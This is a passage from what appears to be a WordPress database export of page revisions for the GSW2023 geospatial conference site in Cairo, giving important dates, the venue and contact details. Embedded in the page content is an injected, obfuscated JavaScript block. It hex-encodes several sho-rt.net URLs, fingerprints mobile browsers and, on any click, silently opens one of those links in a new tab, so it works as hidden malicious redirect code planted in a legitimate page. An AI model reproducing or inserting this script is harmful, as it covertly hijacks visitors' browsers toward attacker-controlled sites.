!important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:13:03','2023-04-02 01:13:03','',3066,'https://gsw2023.com/?p=3985',0,'revision','',0),
(3986,1,'2023-04-02 01:15:48','2023-04-02 01:15:48','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" 